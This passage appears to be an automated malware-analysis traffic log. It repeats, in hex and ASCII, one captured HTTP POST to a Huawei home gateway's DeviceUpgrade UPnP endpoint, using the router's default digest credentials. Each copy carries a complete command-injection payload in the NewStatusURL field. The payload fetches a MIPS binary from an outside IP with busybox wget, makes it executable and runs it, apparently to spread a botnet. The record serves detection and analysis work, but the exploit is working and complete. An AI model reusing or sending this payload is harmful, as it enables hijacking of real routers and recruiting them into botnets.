s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo 